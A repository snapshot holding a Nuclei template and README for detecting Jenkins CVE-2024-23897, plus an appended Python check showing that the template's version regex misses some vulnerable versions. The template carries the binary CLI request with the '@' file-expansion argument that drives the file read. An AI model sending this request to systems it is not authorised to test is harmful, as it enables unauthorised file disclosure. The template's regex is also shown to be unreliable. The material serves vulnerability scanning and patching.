├── README.md
└── cve-2024-23897.yaml

/README.md:
--------------------------------------------------------------------------------
# CVE-2024-23897
> Nuclei Template For Exploit CVE-2024-23897

This template serves as a warning: if the CVE-2024-23897 local file vulnerability is detected on your system, take immediate action and patch without delay. The vulnerability poses a significant risk to the security and integrity of your system, potentially allowing unauthorized access to sensitive files and data.

The template's main purpose is to check if the Jenkins version is exploitable.

Usage:
```
nuclei -t cve-2024-23897.yaml -u http://127.0.0.1:8080
```

![image](https://github.com/kaanatmacaa/CVE-2024-23897/assets/57772940/9e9a5777-6a67-461c-b3a4-b779ffb48b1c)


Installation:
```
git clone https://github.com/kaanatmacaa/CVE-2024-23897.git
sudo mv CVE-2024-23897/cve-2024-23897.yaml /root/nuclei-templates
```


Note:
Create an issue for new ideas.

> Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-23897
--------------------------------------------------------------------------------
/cve-2024-23897.yaml:
--------------------------------------------------------------------------------
id: CVE-2024-23897

info:
  name: Jenkins LFI Vulnerability CVE-2024-23897
  author: katmaca
  severity: high
  description: |
    This template serves as a warning: if the CVE-2024-23897 local file vulnerability is detected on your system, take immediate action and patch without delay.
    The vulnerability poses a significant risk to the security and integrity of your system, potentially allowing unauthorized access to sensitive files and data.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-23897
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-23897

variables:
  # Binary request body sent to the CLI endpoint
  payload: "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03"

http:
  - method: POST
    path:
      - "{{BaseURL}}/cli?remoting=false"
    headers:
      Side: upload
      Session: b442300c-63e4-45c9-8011-6555a78331ee
      Content-Type: application/octet-stream
    body: "{{payload}}"
    # Either matcher is sufficient (nuclei's default matchers-condition is "or")
    matchers:
      # Version string in the response body
      - type: regex
        regex:
          - 'Jenkins ([0-2]+\.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))'
      # Version string in the X-Jenkins response header
      - type: regex
        part: header
        regex:
          - 'X-Jenkins[:] ([0-2]+\.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))'
--------------------------------------------------------------------------------
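
The template decides exposure from the version string in the `X-Jenkins` header. The following added example (not part of the original repository) makes the same decision by numeric comparison against the 2.441 upper bound read off the template's regex, and lists the versions where the regex and the comparison disagree. The function names are hypothetical and the response headers are constructed; only the first two version components are compared, as in the template, so LTS point releases still need checking against the Jenkins advisory.

```python
import re

# Version pattern copied from the template's header matcher, with the dot escaped.
TEMPLATE_RE = re.compile(
    r"X-Jenkins[:] ([0-2]+\.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))"
)
# Highest version the template intends to flag, read off that pattern.
MAX_FLAGGED = (2, 441)
HEADER_RE = re.compile(r"^X-Jenkins:[ \t]*(\d+(?:\.\d+)+)\s*$", re.I | re.M)


def parse_version(raw_headers):
    """Return the X-Jenkins version as a tuple of ints, or None if absent."""
    m = HEADER_RE.search(raw_headers)
    return tuple(int(part) for part in m.group(1).split(".")) if m else None


def numeric_flag(raw_headers):
    """True when (major, minor) <= 2.441; None when no version is exposed."""
    version = parse_version(raw_headers)
    return None if version is None else version[:2] <= MAX_FLAGGED


def template_flag(raw_headers):
    """What the template's regex matcher decides for the same headers."""
    return TEMPLATE_RE.search(raw_headers) is not None


def disagreements(responses):
    """Versions where the regex and the numeric comparison differ."""
    out = []
    for raw in responses:
        numeric = numeric_flag(raw)
        if numeric is not None and numeric != template_flag(raw):
            out.append(".".join(map(str, parse_version(raw))))
    return out


# Constructed response headers (not captured from real hosts).
SAMPLES = [
    "HTTP/1.1 200 OK\r\nX-Jenkins: 2.441\r\nContent-Type: text/html\r\n",
    "HTTP/1.1 200 OK\r\nX-Jenkins: 2.442\r\n",
    "HTTP/1.1 403 Forbidden\r\nX-Jenkins: 2.426.2\r\n",
    "HTTP/1.1 200 OK\r\nX-Jenkins: 2.89.4\r\n",
    "HTTP/1.1 200 OK\r\nX-Jenkins: 2.46.1\r\n",
    "HTTP/1.1 200 OK\r\nServer: nginx\r\n",
]

if __name__ == "__main__":
    print("regex misses:", disagreements(SAMPLES))
```

On the constructed samples the regex does not match 2.89.4 or 2.46.1, although both are below 2.441, so a clean result from the template is not proof that a host is outside the flagged range.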